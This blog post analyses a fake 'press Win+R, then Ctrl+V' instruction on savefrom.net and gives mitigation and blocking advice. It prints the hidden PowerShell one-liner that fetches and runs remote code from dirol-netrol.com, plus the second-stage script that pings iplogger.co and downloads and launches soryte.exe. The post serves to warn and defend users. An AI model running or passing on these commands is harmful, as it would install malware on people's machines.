How I uncover savefrom.net youtube video downloading scam…

How many of you download youtube videos from savefrom.net? Now stop please and if you had done this already then it’s time to clean your system from malware.

At the time of downloading videos, first they will post an instruction on your screen where they will say to type:

Windows icon + R to open run.
Then they will ask you to press Ctrl+V

Upto this point the user stops and called me to check what’s going on. Then I started to investigate. When you press Ctrl+V then the below powershell code will paste in run box. If you mistakenly enter then the code will execute. Here is what will possibly happen.

powershell.exe -W Hidden -command  $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t

When you go to the dirol-netrol link, then you will see lot’s of powershell commands.

Invoke-WebRequest -Uri 'https://iplogger.co/1EccL4'

$hvocuh = "$env:ALLUSERSPROFILE\golbus"

if (!(Test-Path $hvocuh)) { New-Item -Path $hvocuh -ItemType Directory }

$jvnsuej = "$env:ALLUSERSPROFILE\maram.zip"

$yfnyich = 'https://ment-sema.com/lumsa.zip'

$umchshyf = Join-Path $hvocuh 'soryte.exe'

Invoke-WebRequest -Uri $yfnyich -OutFile $jvnsuej

Invoke-WebRequest -Uri 'https://iplogger.co/1EwuL4'

Expand-Archive -Path $jvnsuej -DestinationPath $hvocuh -Force

Start-Process -FilePath $umchshyf

Remove-Item $jvnsuej -Force

Start-Process -FilePath $umchshyf

First Code Snippet:

powershell.exe -W Hidden -command $uR='https://dirol-netrol.com/poimi/toto.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t

-W Hidden: Runs PowerShell in hidden mode, so the user doesn’t see a window, making it stealthy.

$uR=’https://dirol-netrol.com/poimi/toto.txt': Defines the URL that hosts a PowerShell script or code.

$reS=Invoke-WebRequest -Uri $uR -UseBasicParsing: Downloads the content of the URL (toto.txt) and stores it in $reS.Content.

iex $t: Executes the downloaded content as PowerShell code. This introduces a significant risk because it allows remote code execution on the machine.

Second Code Snippet (Downloaded Content)

Invoke-WebRequest -Uri 'https://iplogger.co/1EccL4'

Purpose: Sends a request to an IP logger, likely to track the victim’s IP address.

$hvocuh = "$env:ALLUSERSPROFILE\golbus"
if (!(Test-Path $hvocuh)) { New-Item -Path $hvocuh -ItemType Directory }

Purpose:
Creates a directory named golbus in the C:\ProgramData folder if it doesn’t already exist.
The C:\ProgramData directory is often used by malware to hide malicious files.

$jvnsuej = "$env:ALLUSERSPROFILE\maram.zip"
$yfnyich = 'https://ment-sema.com/lumsa.zip'
$umchshyf = Join-Path $hvocuh 'soryte.exe'

Variables:
$jvnsuej: Path for a downloaded ZIP file (maram.zip) in C:\ProgramData.
$yfnyich: URL of the ZIP file to be downloaded (lumsa.zip).
$umchshyf: Final path for an extracted executable file (soryte.exe).

Invoke-WebRequest -Uri $yfnyich -OutFile $jvnsuej

Purpose: Downloads the ZIP file from https://ment-sema.com/lumsa.zip and saves it as maram.zip in C:\ProgramData.

Invoke-WebRequest -Uri 'https://iplogger.co/1EwuL4'

Purpose: Sends another request to a different IP logger for additional tracking.

Expand-Archive -Path $jvnsuej -DestinationPath $hvocuh -Force

Purpose: Extracts the contents of the ZIP file (maram.zip) to the golbus directory.

Start-Process -FilePath $umchshyf

Purpose: Executes the extracted file (soryte.exe). This is highly suspicious as the file’s purpose is unknown and could be malware.

Remove-Item $jvnsuej -Force

Purpose: Deletes the downloaded ZIP file (maram.zip) to cover tracks.

Start-Process -FilePath $umchshyf

Purpose: Runs the executable (soryte.exe) again, possibly ensuring persistence or starting its malicious payload.

Mitigation Steps:

Disconnect the System:
Immediately disconnect the system from the network to prevent further communication with the attacker’s servers.

Delete Malicious Files:
Look for and remove suspicious files in C:\ProgramData\golbus and other system directories.

Scan for Malware:
Run a full system scan with a trusted antivirus or antimalware tool. Use my below link to download free AV and start cleaning.

Free Antivirus solution’s and other security tool’s to detect and clean malware from infected…

Block URLs:
Block dirol-netrol.com, ment-sema.com, and iplogger.co at the firewall level.

Inspect the System:
Check for unusual processes, scheduled tasks, or startup programs related to soryte.exe using autoruns tool from Microsoft sysinternals
Reinstall the OS (if compromised):

If the system’s integrity cannot be guaranteed, consider reinstalling the operating system.
Let me know if you’d like more specific guidance!

Thanks. I hope this blog will help you to stop downloading youtube videos from this site onwards. If you find this helpful please consider to subscribe below and share with your network to save others.

LinkedIn:

https://www.linkedin.com/in/md-mahimbin-firoj-7b8a5a113/

YouTube:

https://www.youtube.com/@mahimfiroj1802/videos